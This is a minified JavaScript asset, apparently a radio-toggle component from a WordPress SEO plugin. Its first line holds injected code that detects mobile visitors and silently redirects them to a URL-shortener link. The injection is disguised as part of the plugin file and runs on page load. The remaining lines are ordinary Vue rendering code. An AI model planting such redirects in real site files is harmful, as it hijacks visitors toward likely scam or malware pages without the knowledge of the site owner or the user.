(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as i}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as l,i as t,O as u,ad as c,j as s,B as d,ae as _,U as m,P as o}from"./vendor-vue-ui.232c7c36.js";const f={props:{options:{type:Array,required:!0},name:{type:String,required:!0},modelValue:[String,Boolean],disabled:{type:Boolean,default(){return!1}},inline:Boolean,circle:Boolean}},y=["id","name","onInput","checked","disabled"],g=["for"];function b(r,B,e,p,v,V){return l(),t("div",{class:o(["aioseo-radio-toggle",{inline:e.inline,circle:e.circle}])},[(l(!0),t(u,null,c(e.options,(a,n)=>(l(),t("div",{key:n},[s("input",{id:`id_${e.name}_${n}`,name:e.name,type:"radio",onInput:h=>r.$emit("update:modelValue",a.value),checked:a.value===e.modelValue,disabled:e.disabled||a.disabled},null,40,y),s("label",{for:`id_${e.name}_${n}`,class:o([{[a.activeClass||"default"]:a.value===e.modelValue},{disabled:e.disabled||a.disabled}])},[d(r.$slots,a.slot,{},()=>[_(m(a.label),1)])],10,g)]))),128))],2)}const S=i(f,[["render",b]]);export{S as B};
